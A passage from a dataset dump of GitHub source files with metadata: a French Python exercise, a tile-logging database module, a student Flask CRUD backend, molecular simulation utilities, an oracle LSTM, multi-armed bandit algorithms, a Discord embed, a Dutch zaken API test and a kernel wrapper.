printTitre(\"Choix de l'exercice à tester\")\r\n for i in range(1,4) :\r\n print(\"- exercice n° 5.\", i)\r\n n = int(input(\"numéro :\"))\r\n \r\n if n == 1 : exo5_1 (table)\r\n elif n == 2 : exo5_2 (table)\r\n elif n == 3 : exo5_3 (table)\r\n else : print(\"Dommage, vous ne savez pas lire !\")\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Ne fonctionne que si c'est ce fichier qui est activé directement\r\n La variable __name__ prend la valeur du fichier activé en premier.\r\n \"\"\"\r\n main()\r\n\r\n\r\n\r\n","repo_name":"NsiLycee/premiere","sub_path":"programmeNSI/cours/exo/exo5.py","file_name":"exo5.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10365824707","text":"import logging\nimport sys\nimport time\n\nimport psycopg2.sql\nfrom prometheus_client import Summary\n\nimport tilecloud_chain.configuration\nfrom tilecloud import Tile\n\n_LOGGER = logging.getLogger(__name__)\n\n_INSERT_SUMMARY = Summary(\"tilecloud_chain_database_logger\", \"Number of database inserts\", [\"layer\"])\n\n\nclass DatabaseLoggerCommon:\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool):\n db_params = config[\"database\"]\n while True:\n try:\n self.connection = psycopg2.connect(\n dbname=db_params[\"dbname\"],\n host=db_params.get(\"host\"),\n port=db_params.get(\"port\"),\n user=db_params.get(\"user\"),\n password=db_params.get(\"password\"),\n )\n break\n except psycopg2.OperationalError:\n _LOGGER.warning(\"Failed connecting to the database. Will try again in 1s\", exc_info=True)\n if daemon:\n time.sleep(1)\n else:\n sys.exit(2)\n if \".\" in db_params[\"table\"]:\n schema, table = db_params[\"table\"].split(\".\")\n else:\n schema = \"public\"\n table = db_params[\"table\"]\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n \"SELECT EXISTS(SELECT 1 FROM pg_tables WHERE schemaname=%s AND tablename=%s)\", (schema, table)\n )\n schema = psycopg2.extensions.quote_ident(schema, self.connection)\n table = psycopg2.extensions.quote_ident(table, self.connection)\n\n if not cursor.fetchone()[0]:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"CREATE TABLE {}.{} (\"\n \" id BIGSERIAL PRIMARY KEY,\"\n \" layer CHARACTER VARYING(80) NOT NULL,\"\n \" run INTEGER NOT NULL,\"\n \" action CHARACTER VARYING(7) NOT NULL,\"\n \" tile TEXT NOT NULL,\"\n \" UNIQUE (layer, run, tile))\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table))\n )\n self.connection.commit()\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to create table %s.%s\", schema, table)\n sys.exit(1)\n else:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {}.{}(layer, run, action, tile) VALUES (%s, %s, %s, %s)\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table)),\n (\"test_layer\", -1, \"test\", \"-1x-1\"),\n )\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to insert logging data into %s.%s\", schema, table)\n sys.exit(1)\n finally:\n self.connection.rollback()\n\n self.schema = schema\n self.table = table\n\n\nclass DatabaseLoggerInit(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool) -> None:\n super().__init__(config, daemon)\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n psycopg2.sql.SQL(\"SELECT COALESCE(MAX(run), 0) + 1 FROM {}.{}\").format(\n psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)\n )\n )\n (self.run,) = cursor.fetchone()\n\n def __call__(self, tile: Tile) -> Tile:\n tile.metadata[\"run\"] = self.run\n return tile\n\n\nclass DatabaseLogger(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __call__(self, tile: Tile) -> Tile:\n if tile is None:\n _LOGGER.warning(\"The tile is None\")\n return None\n\n if tile.error:\n action = \"error\"\n elif tile.data:\n action = \"create\"\n else:\n action = \"delete\"\n\n layer = tile.metadata.get(\"layer\", \"- No layer -\")\n run = tile.metadata.get(\"run\", -1)\n\n with _INSERT_SUMMARY.labels(layer).time():\n with self.connection.cursor() as cursor:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {} (layer, run, action, tile) \"\n \"VALUES (%(layer)s, %(run)s, %(action)s::varchar(7), %(tile)s)\"\n ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n )\n except psycopg2.IntegrityError:\n self.connection.rollback()\n cursor.execute(\n psycopg2.sql.SQL(\n \"UPDATE {} SET action = %(action)s \"\n \"WHERE layer = %(layer)s AND run = %(run)s AND tile = %(tile)s\"\n ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n )\n\n self.connection.commit()\n\n return tile\n","repo_name":"camptocamp/tilecloud-chain","sub_path":"tilecloud_chain/database_logger.py","file_name":"database_logger.py","file_ext":"py","file_size_in_byte":5666,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"48"} +{"seq_id":"40318111217","text":"from flask import Flask, json, request, jsonify\nfrom flask_cors import CORS\nfrom Crud_Usuarios import Crud_Users\nfrom Crud_publicaciones import Crud_posts\n\ncrud_usuarios = Crud_Users()\ncrud_publiciones = Crud_posts()\napp = Flask(__name__)\nCORS(app)\n\n# Insertar nuevo usuario\n@app.route('/usuario', methods=[\"PUT\"])\ndef insertarUsuario():\n email = request.json[\"email\"]\n pwd = request.json[\"password\"]\n name = request.json[\"name\"]\n gener = request.json[\"gener\"]\n username = request.json[\"username\"]\n\n resultado = crud_usuarios.Crear_User(email, pwd, name, gener, username)\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Insertar nuevo post\n@app.route('/post', methods=[\"PUT\"])\ndef insertarpost():\n tipo = request.json[\"tipo\"]\n url = request.json[\"url\"]\n date = request.json[\"date\"]\n category = request.json[\"category\"]\n author = request.json[\"author\"]\n\n resultado = crud_publiciones.Crear_post(tipo, url,date,category,author)\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Login\n@app.route('/Login', methods=[\"POST\"])\ndef Login():\n email = request.json[\"email\"]\n password = request.json[\"password\"]\n\n resultado = crud_usuarios.login(email, password)\n if resultado:\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n else:\n return jsonify({\"mensaje\": \"Credenciales incorrectas\"}), 404\n \n# Recuperar usuarios\n@app.route('/devolver_todo',methods=[\"GET\"])\ndef devolver_usuarios():\n resultado = crud_usuarios.Read_all_users()\n return jsonify(resultado),200\n\n# Recuperar posts\n@app.route('/devolver_Posts',methods=[\"GET\"])\ndef devolver_posts():\n resultado = crud_publiciones.Read_all_posts()\n return jsonify(resultado),200\n\n# Buscar un usuario \n@app.route('/buscar_usuario', methods=[\"POST\"])\ndef buscar_un_usuario():\n email = request.json[\"email\"]\n resultado = crud_usuarios.Leer_un_usuario(email)\n return jsonify(resultado), 200\n\n# Buscar un post \n@app.route('/buscar_post', methods=[\"POST\"])\ndef buscar_un_post():\n id = request.json[\"id\"]\n resultado = crud_publiciones.Leer_un_post(id)\n return jsonify(resultado), 200 \n\n# Actualizar usuario\n@app.route('/actualizar', methods = [\"POST\"])\ndef metodoactualizar():\n email = request.json[\"email\"]\n pwd = request.json[\"password\"]\n name = request.json[\"name\"]\n gener = request.json[\"gener\"]\n username = request.json[\"username\"]\n\n resultado = crud_usuarios.updateUser(email, pwd, name, gener, username)\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n\n# Actualizar post\n@app.route('/actualizarpost', methods = [\"POST\"])\ndef metodoactualizarpost():\n id = request.json[\"id\"] \n tipo = request.json[\"tipo\"] \n url = request.json[\"url\"] \n date = request.json[\"date\"] \n category = request.json[\"category\"] \n likes = request.json[\"likes\"] \n author = request.json[\"author\"] \n\n resultado = crud_publiciones.updatepost(id,tipo, url,date,category,likes,author)\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Actualizar like\n@app.route('/actualizarlike', methods = [\"POST\"])\ndef metodoactualizarlike():\n id = request.json[\"id\"] \n \n resultado = crud_publiciones.updatepost(id)\n return jsonify({\"data\": resultado, \"mensaje\": \"OK\"}), 200\n\n# Eliminar usuario\n@app.route('/eliminar',methods=[\"DELETE\"])\ndef eliminar():\n email = request.json[\"email\"]\n resultado = crud_usuarios.eliminarUsuario(email)\n return jsonify({\"mensaje\":resultado}), 200\n\n# Eliminar post\n@app.route('/eliminarpost',methods=[\"DELETE\"])\ndef eliminarpost():\n id = request.json[\"id\"]\n resultado = crud_publiciones.eliminarposts(id)\n return jsonify({\"mensaje\":resultado}), 200\n \n\n# Carga masiva usuarios\n@app.route('/usuarios/carga-masiva', methods=[\"POST\"])\ndef cargaMasiva():\n usuarios = request.json[\"usuarios\"]\n resultado = crud_usuarios.cargaMasiva(usuarios)\n if resultado == \"OK\":\n return jsonify({\"data\": crud_usuarios.Read_all_users(), \"mensaje\": \"OK\"}), 200\n else:\n return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n\n# Carga masiva post\n@app.route('/post/carga-masivai', methods=[\"POST\"])\ndef cargaMasivaposti():\n images = request.json[\"images\"]\n resultado = crud_publiciones.cargaMasiva(images)\n \n\n if resultado == \"OK\":\n return jsonify({\"data\": crud_publiciones.Read_all_posts(), \"mensaje\": \"OK images\"}), 200\n else:\n return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n\n@app.route('/post/carga-masivav', methods=[\"POST\"])\ndef cargaMasivapostv():\n videos = request.json[\"videos\"]\n resultado = crud_publiciones.cargaMasiva(videos)\n \n\n if resultado == \"OK\":\n return jsonify({\"data\": crud_publiciones.Read_all_posts(), \"mensaje\": \"OK videos\"}), 200\n else:\n return jsonify({\"mensaje\": \"Hubo un error en la carga masiva\"}), 400\n#ruta por defecto\n@app.route('/', methods=[\"GET\"])\ndef Raiz():\n return jsonify({\"mensaje\":\"Servidor Levantado\"}), 200\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', debug=True, port=4000)","repo_name":"Rodolfo-C-Andres/Proyecto2","sub_path":"Backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2647988822","text":"import mdtraj as md\nimport numpy as np\n\nfrom alias.src.utilities import unit_vector\n\n\ndef molecular_positions(\n atom_coord,\n atoms,\n masses,\n mode='molecule',\n com_sites=None):\n \"\"\"\n Returns XYZ array of molecular positions from array of atoms\n\n Parameters\n ----------\n atom_coord: array_like of floats\n Positions of particles in 3 dimensions\n atoms: list of st\n Names of each atom in molecule\n masses: array_like of float\n Masses of all atomic sites in g mol-1\n mode: str, optional, default: 'molecule'\n Mode of calculation, either 'molecule' or 'sites':\n if `molecule`, molecular centre of mass is used.\n Otherwise, if 'sites', only atoms with corresponding\n indices given by com_sites are used.\n com_sites: str or list of str, optional\n List of atomic site names to use in center of mass\n calculation\n\n Returns\n -------\n mol_coord: array_like of floats\n Positions of molecules in 3 dimensions\n \"\"\"\n\n # Calculate the expected number of molecules in mol_coord\n n_site = len(atoms)\n n_mol = atom_coord.shape[0] // n_site\n\n # Create an empty array containing molecular coordinates\n mol_coord = np.zeros((n_mol, 3))\n\n assert mode in ['molecule', 'sites'], (\n f\"Argument mode=={mode} must be either 'molecule' or 'sites'\"\n )\n\n # Use centre of mass of molecule as molecular position\n if mode == 'molecule':\n for i in range(3):\n mol_coord[:, i] = np.sum(\n np.reshape(\n atom_coord[:, i] * masses, (n_mol, n_site)\n ), axis=1\n )\n mol_coord[:, i] *= n_mol / masses.sum()\n\n return mol_coord\n\n # Convert integer com_sites input into a list\n if isinstance(com_sites, str):\n com_sites = [com_sites]\n\n assert len(com_sites) < n_site, (\n f\"Argument com_sites must have a length ({len(com_sites)}) \"\n f\"less than n_sites ({n_site})\"\n )\n\n indices = [atoms.index(site) for site in com_sites]\n\n # Use single atom as molecular position\n if len(com_sites) == 1:\n mol_list = np.arange(n_mol) * n_site + int(indices[0])\n for i in range(3):\n mol_coord[:, i] = atom_coord[mol_list, i]\n\n # Use centre of mass of a group of atoms within molecule as\n # molecular position\n elif len(com_sites) > 1:\n mol_list = np.arange(n_mol) * n_site\n mol_list = mol_list.repeat(len(com_sites))\n mol_list += np.tile(indices, n_mol)\n\n for i in range(3):\n mol_coord[:, i] = np.sum(\n np.reshape(\n atom_coord[mol_list, i] * masses[mol_list],\n (n_mol, len(com_sites))\n ), axis=1\n )\n mol_coord[:, i] *= n_mol / masses[mol_list].sum()\n\n return mol_coord\n\n\ndef minimum_image(d_array, pbc_box):\n \"\"\"Mutates d_array to yield the minimum signed value of each\n element, based on periodic boundary conditions given by pbc_box\n Parameters\n ---------\n d_array: array_like of float\n Array of elements in n dimensions, where the last axis\n corresponds to a vector with periodic boundary conditions\n enforced by values in pbc_box\n pbc_box: array_like of floats\n Vector containing maximum signed value for each element\n in d_array\n \"\"\"\n\n assert d_array.shape[-1] == pbc_box.shape[-1]\n\n # Obtain minimum image distances based on rectangular\n # prism geometry\n for i, dim in enumerate(pbc_box):\n d_array[..., i] -= dim * np.rint(\n d_array[..., i] / dim\n )\n\n\ndef coordinate_arrays(traj, atoms, masses, mode='molecule',\n com_sites=None):\n \"\"\"Return arrays of molecular centre of masses for each frame in\n trajectory\"\"\"\n\n atom_traj = traj.xyz * 10\n mol_traj = np.empty((0, traj.n_residues, 3))\n\n for index, atom_coord in enumerate(atom_traj):\n\n mol_coord = molecular_positions(\n atom_coord,\n atoms,\n masses,\n mode=mode,\n com_sites=com_sites\n )\n\n mol_traj = np.concatenate([\n mol_traj, np.expand_dims(mol_coord, 0)])\n\n return mol_traj\n\n\ndef orientation(traj, center_atom, vector_atoms):\n \"\"\"\n Calculates orientational unit vector for lipid models,\n based on vector between phosphorus group\n and carbon backbone.\n \"\"\"\n\n center_indices = [\n atom.index for atom in traj.topology.atoms\n if (atom.name == center_atom)]\n atom_indices = [\n [atom.index for atom in traj.topology.atoms\n if (atom.name == name)]\n for name in vector_atoms\n ]\n\n atom_coord = traj.xyz * 10\n dim = traj.unitcell_lengths * 10\n u_vectors = np.zeros(\n (atom_coord.shape[0], len(center_indices), 3))\n\n for j in range(atom_coord.shape[0]):\n\n midpoint = [\n atom_coord[j][index] for index in atom_indices\n ]\n midpoint = sum(midpoint) / len(midpoint)\n\n vector = atom_coord[j][center_indices] - midpoint\n\n for i, l in enumerate(dim[j]):\n vector[:, i] -= l * np.array(\n 2 * vector[:, i] / l, dtype=int)\n\n u_vectors[j] = unit_vector(vector)\n\n return u_vectors\n\n\ndef batch_coordinate_loader(\n trajectory, surface_parameters, topology=None, chunk=500):\n \"\"\"Generates molecular positions and centre of mass for each frame\n\n Parameters\n ----------\n trajectory: str\n Path to trajectory file\n surface_parameters: instance of SurfaceParameters\n Parameters for intrinsic surface\n topology: str, optional\n Path to topology file\n chunk int, optional\n Maximum chunk size for mdtraj batch loading\n \"\"\"\n mol_traj = np.empty((0, surface_parameters.n_mols, 3))\n mol_vec = np.empty((0, surface_parameters.n_mols, 3))\n com_traj = np.empty((0, 3))\n cell_dim = np.zeros((0, 3))\n\n masses = np.repeat(\n surface_parameters.masses, surface_parameters.n_mols)\n\n for index, traj in enumerate(\n md.iterload(trajectory, chunk=chunk, top=topology)):\n\n cell_dim_chunk = traj.unitcell_lengths * 10\n com_chunk = md.compute_center_of_mass(traj) * 10\n\n traj = traj.atom_slice(surface_parameters.atom_indices)\n mol_chunk = coordinate_arrays(\n traj, surface_parameters.atoms, masses,\n mode=surface_parameters.com_mode,\n com_sites=surface_parameters.com_sites)\n\n mol_traj = np.concatenate([mol_traj, mol_chunk])\n com_traj = np.concatenate([com_traj, com_chunk])\n cell_dim = np.concatenate([cell_dim, cell_dim_chunk])\n\n vec_chunk = orientation(\n traj, surface_parameters.center_atom,\n surface_parameters.vector_atoms\n )\n mol_vec = np.concatenate([mol_vec, vec_chunk])\n\n return mol_traj, com_traj, cell_dim, mol_vec\n\n\ndef check_pbc(xmol, ymol, zmol, pivots, dim, max_r=30):\n \"\"\"\n Check periodic boundary conditions of molecule positions\n to ensure most appropriate position along is used wrt each\n surface.\n\n Parameters\n ----------\n xmol: float, array_like; shape=(nmol)\n Molecular coordinates in x dimension\n ymol: float, array_like; shape=(nmol)\n Molecular coordinates in y dimension\n zmol: float, array_like; shape=(nmol)\n Molecular coordinates in z dimension\n pivots: float, array_like\n Indices of pivot molecules\n dim: float\n Cell dimensions\n max_r: float\n Maximum distance between neighbours\n\n Returns\n -------\n zmol: float, array_like; shape=(nmol)\n Molecular coordinates in z dimension using most\n appropriate PBC\n \"\"\"\n\n # Create pivot map\n for index_i, pivot in enumerate(pivots):\n p_map = np.isin(np.arange(zmol.size), pivot)\n\n for check in range(2):\n for index_j, n in enumerate(pivot):\n\n dxyz = np.stack(\n (xmol[p_map] - xmol[n],\n ymol[p_map] - ymol[n],\n zmol[p_map] - zmol[n])\n )\n for index_k, l in enumerate(dim[:2]):\n dxyz[index_k] -= l * np.array(\n 2 * dxyz[index_k] / l, dtype=int)\n\n dr2 = np.sum(dxyz**2, axis=0)\n neighbour_count = np.count_nonzero(dr2 < max_r**2)\n\n dxyz[2] += dim[2] * np.array([-1, 1])[index_i]\n dr2 = np.sum(dxyz**2, axis=0)\n neighbour_count_flip = np.count_nonzero(dr2 < max_r**2)\n\n if neighbour_count_flip > neighbour_count:\n zmol[n] += dim[2] * np.array([1, -1])[index_i]\n\n return zmol\n","repo_name":"franklongford/ALIAS","sub_path":"alias/src/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6388076057","text":"import codecs\nimport os\nimport pickle\n\nimport numpy as np\n\nfrom utils.file_handler import write_text\nfrom metrics.oracle.target_lstm import TARGET_LSTM\n\n\nclass Oracle_LSTM(TARGET_LSTM):\n def __init__(self, num_emb=5000, batch_size=128, emb_dim=3200, hidden_dim=32, sequence_length=20, start_token=0,\n params=None,\n sess_config=None):\n import tensorflow as tf\n if params is None:\n current_dir = os.path.dirname(os.path.abspath(__file__))\n full_path = os.path.join(current_dir, \"target_params_py3.pkl\")\n with codecs.open(full_path, \"rb\") as f:\n params = pickle.load(f)\n self.graph_obj = tf.Graph()\n with self.graph_obj.as_default():\n super().__init__(num_emb, batch_size, emb_dim, hidden_dim, sequence_length, start_token, params)\n if sess_config is None:\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n self.sess = tf.Session(graph=self.graph_obj, config=sess_config)\n self.sess.run(tf.global_variables_initializer())\n\n def generate(self, number=None):\n if number is None:\n number = self.batch_size\n generated_number = 0\n tmp = []\n while generated_number < number:\n tmp.append(super().generate(self.sess))\n generated_number += tmp[-1].shape[0]\n return np.concatenate(tmp, axis=0)[:number, :]\n\n def log_probability(self, inp):\n if type(inp) is np.ndarray:\n assert len(inp.shape) == 2 and inp.shape[1] == self.sequence_length\n elif type(inp) is list:\n inp = np.array(inp)\n assert len(inp.shape) == 2 and inp.shape[1] == self.sequence_length\n else:\n raise ValueError\n\n inp_len = inp.shape[0]\n res = np.ones(inp_len) * np.nan\n\n new_inp = np.concatenate((inp, np.zeros(((-1 * inp_len) % self.batch_size, self.sequence_length))), axis=0)\n assert new_inp.shape[0] % self.batch_size == 0, new_inp.shape\n for start_inx in range(0, new_inp.shape[0], self.batch_size):\n end_inx = start_inx + self.batch_size\n tmp = self.sess.run(self.out_loss, {self.x: new_inp[start_inx:end_inx]})\n res[start_inx:min(end_inx, inp_len)] = tmp[:min(end_inx, inp_len) - start_inx]\n print(res.shape)\n return -1. * res\n\n\nif __name__ == \"__main__\":\n oracle = Oracle_LSTM(batch_size=64)\n x = oracle.generate(37500)\n x = [\" \".join([str(xxx) for xxx in xx]) for xx in x]\n write_text(x, 'oracle37.5-train')\n","repo_name":"Danial-Alh/TextGenerationEvaluator","sub_path":"src/metrics/oracle/oracle_lstm.py","file_name":"oracle_lstm.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40827546185","text":"\"\"\"\nThis module implements the UCB and linUCB algorithms used for beam alignment\nand tracking problems.\n\"\"\"\nfrom dataclasses import dataclass\nimport numpy as np\nfrom typing import List\n\n\n@dataclass\nclass ARM:\n # i-th beamforming of BS\n i: int = None\n # j-th beamforming of UE\n j: int = None\n # number of times this arm is played\n n_play: int = 0\n\n\n@dataclass\nclass ArmUCB(ARM):\n # mean reward\n mu: float = 0\n\n\nclass UCB:\n def __init__(self, arms: List[ArmUCB], delta: float) -> None:\n # list of all arms\n self.arms = arms\n # number of arms\n self.n_arms = len(arms)\n # uncertainty probability\n self.delta = delta\n\n def select_arm(self, t: int) -> int:\n \"\"\"\n Select an arm to pull.\n\n Args:\n t (int): the time index.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n if t < self.n_arms:\n return t\n else:\n # upper confidence bound for all arms\n ucb = [\n arm.mu + np.sqrt(2 * np.log10(1/self.delta) / arm.n_play)\n for arm in self.arms\n ]\n return np.argmax(ucb)\n\n def pull_arm(self, k: int, r: float) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when k-th arm is pulled.\n \"\"\"\n # update the estimated reward\n self.arms[k].mu = (self.arms[k].mu * self.arms[k].n_play + r) / (\n self.arms[k].n_play + 1\n )\n # update the number of arms that have been played\n self.arms[k].n_play += 1\n\n\n@dataclass\nclass ArmLinUCB(ARM):\n # matrix A, this is used in LinUCB\n A: np.array = None\n # vector b, this is used in LinUCB\n b: np.array = None\n # the estimated vector phi, or coefficient vector\n # this is used in LinUCB\n phi: np.array = None\n\n\nclass LinUCB:\n # Implement the LinUCB algorithm\n # References: Li, Lihong, et al. \"A contextual-bandit approach to\n # personalized news article recommendation.\" Proceedings of the 19th\n # international conference on World wide web. 2010.\n def __init__(\n self, arms: List[ArmLinUCB], delta: float = 0.05, d: int = 2\n ) -> None:\n # list of all arms\n self.arms = arms\n # Initialize phi and b as zero vectors\n # Initialize A as an Identity vector\n for arm in arms:\n arm.phi = np.zeros((d, 1))\n arm.A = np.eye(d)\n arm.b = np.zeros((d, 1))\n # number of arms\n self.n_arms = len(arms)\n # the LinUCB parameter delta, where 1 - delta is the probability of\n # guaranteeing the inequality.\n self.delta = delta\n # the dimension of the contextual vector is d x 1\n self.d = d\n\n def select_arm(self, x: np.array) -> int:\n \"\"\"\n Select an arm to pull.\n\n Args:\n x (np.array): the contextual vector in the corresponding timeslot.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n alpha = 1 + np.sqrt(0.5 * np.log(2 / self.delta))\n\n def calc_p(arm: ArmLinUCB) -> float:\n \"\"\"\n Calculate the p_{t,a} for the ARM a.\n Note that all the values of A, D, c and phi were already updated\n in the attributes of the arm.\n \"\"\"\n return np.mat(x).T * np.mat(arm.phi) + alpha * np.sqrt(\n np.mat(x).T * np.linalg.inv(arm.A) * np.mat(x)\n )\n\n return np.argmax([calc_p(arm) for arm in self.arms])\n\n def pull_arm(self, k: int, r: float, x: np.array) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when the k-th arm is pulled.\n x (np.array): The contextual vector in the corresponding timeslot.\n \"\"\"\n # update matrix A and vector b\n self.arms[k].A = self.arms[k].A + np.mat(x) * np.mat(x).T\n self.arms[k].b = self.arms[k].b + r * np.mat(x)\n # update new estimation of phi\n self.arms[k].phi = np.linalg.inv(self.arms[k].A) * np.mat(\n self.arms[k].b\n )\n # update the number of times the arm is pulled\n self.arms[k].n_play += 1\n\n\n@dataclass\nclass ArmExp3(ARM):\n # weight for each arm, initialized as 1\n w: float = 1\n # probability of selecting this arm\n p: float = None\n\n\nclass Exp3:\n # Implement the Exp3 algorithm\n # Paper: The non-stochastic multi-armed bandit problem.\n def __init__(self, arms: List[ArmExp3], gamma: float = 0.9) -> None:\n # the list of arms\n self.arms = arms\n # learning rate in the range [0, 1]\n self.gamma = gamma\n\n def select_arm(self) -> int:\n \"\"\"\n Select an arm to pull.\n\n Returns:\n int: the index of the pulled arm.\n \"\"\"\n sum_weights = np.sum([arm.w for arm in self.arms])\n # Calculate the probability for each arm\n for arm in self.arms:\n arm.p = (1 - self.gamma) * arm.w / sum_weights + self.gamma / len(\n self.arms\n )\n # print('Probability:', [arm.p for arm in self.arms])\n # print('Weights:', [arm.w for arm in self.arms])\n return np.random.choice(\n range(len(self.arms)), p=[arm.p for arm in self.arms]\n )\n\n def pull_arm(self, k: int, r: float) -> None:\n \"\"\"\n Pull a k-th arm and update the attributes of arms.\n\n Args:\n k (int): The index of the pulled arm.\n r (float): Reward received when k-th arm is pulled.\n \"\"\"\n self.arms[k].n_play += 1\n # only update the weight of the selected arm\n # estimated reward\n x_hat = r / self.arms[k].p\n self.arms[k].w *= np.exp(self.gamma * x_hat / len(self.arms))\n","repo_name":"SonDinhVan/beam_training_contextual_bandits_THz","sub_path":"modules/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31823147783","text":"from discord import Embed, Colour\n\nfrom config import png_strip_for_embed, png_butterfly_gif\n\n\nclass AcceptedClanCloseEmbed(object):\n def __init__(self, clan_name):\n self._embed = Embed(\n description=f'***```Вы успешно приняли запрос на клоз\\nОжидайте ответ ивентера...```***',\n color=Colour(0x1FFF00)\n )\n self._embed.set_author(\n name=f'Ваш противник {clan_name}',\n icon_url=png_butterfly_gif),\n self._embed.set_image(url=png_strip_for_embed)\n\n @property\n def embed(self):\n return self._embed\n\n\n","repo_name":"BladeXses21/clan_staff_v1","sub_path":"main/src/embeds/clan_embed/clan_close/accepted_close.py","file_name":"accepted_close.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4593767959","text":"\"\"\"\nUit vng-Realisatie/gemma-zaken#169 en vng-Realisatie/gemma-zaken#45 blijkt dat\nhet mogelijk moet zijn om de behandelaar toe te wijzen aan een zaak.\n\nDit kan automatisch uit de zaaktypecatalogus (op basis van zaaktype), of\ndoor een manuele actie van een KCC medewerker getriggered worden.\n\"\"\"\nfrom .constants import CATALOGUS_UUID, ZAAKTYPE_UUID\n\n\ndef test_zet_behandelaar_op_basis_van_zaaktype(zrc_client, ztc_client):\n # vraag zaaktype op\n zaaktype = ztc_client.retrieve('zaaktype', catalogus_uuid=CATALOGUS_UUID, uuid=ZAAKTYPE_UUID)\n\n zrc_client.auth.set_claims(\n scopes=['zds.scopes.zaken.aanmaken'],\n zaaktypes=[zaaktype['url']]\n )\n\n # maak een zaak aan\n zaak = zrc_client.create('zaak', {\n 'zaaktype': zaaktype['url'],\n 'bronorganisatie': '517439943',\n 'startdatum': '2018-06-18',\n 'registratiedatum': '2018-06-18',\n 'verantwoordelijkeOrganisatie': '223122166',\n })\n assert 'url' in zaak\n\n # vraag behandelaar op\n roltypen = ztc_client.list(\n 'roltype', catalogus_uuid=CATALOGUS_UUID, zaaktype_uuid=ZAAKTYPE_UUID,\n query_params={'omschrijvingGeneriek': 'Behandelaar'}\n )\n\n assert len(roltypen) == 1\n\n # zet de behandelaar\n behandelaar = roltypen[0]['mogelijkeBetrokkenen'][0]\n rol = zrc_client.create('rol', {\n 'zaak': zaak['url'],\n 'betrokkene': behandelaar['betrokkene'],\n 'betrokkeneType': behandelaar['betrokkeneType'],\n 'rolomschrijving': 'Behandelaar',\n 'roltoelichting': 'Automatisch toegewezen op basis van zaaktype',\n })\n\n assert 'url' in rol\n","repo_name":"VNG-Realisatie/gemma-zaken-test-integratie","sub_path":"tests/test_userstory_45.py","file_name":"test_userstory_45.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5655900947","text":"from typing import Any, Callable, Dict, Union\n\nimport jax\nimport jax.numpy as jnp\nimport pydantic\nfrom flax.core.frozen_dict import FrozenDict\n\nfrom src.kernels.base import KernelBase, KernelBaseParameters\nfrom src.module import PYDANTIC_VALIDATION_CONFIG\n\n\nclass CustomKernelParameters(KernelBaseParameters):\n \"\"\"\n The parameters of a custom kernel where the parameters can be any type.\n \"\"\"\n\n custom: Any\n\n\nclass CustomKernel(KernelBase):\n \"\"\"\n A wrapper class for any custom kernel function.\n \"\"\"\n\n Parameters = CustomKernelParameters\n\n def __init__(\n self,\n kernel_function: Callable[[Any, jnp.ndarray, jnp.ndarray], jnp.float64],\n preprocess_function: Callable = None,\n ):\n \"\"\"\n Define a kernel using a custom kernel function.\n\n Args:\n kernel_function: The kernel function provided by the NTK package.\n preprocess_function: preprocess inputs before passing to kernel function\n \"\"\"\n self.kernel_function = kernel_function\n KernelBase.__init__(self, preprocess_function=preprocess_function)\n\n @pydantic.validate_arguments(config=PYDANTIC_VALIDATION_CONFIG)\n def generate_parameters(\n self, parameters: Union[FrozenDict, Dict]\n 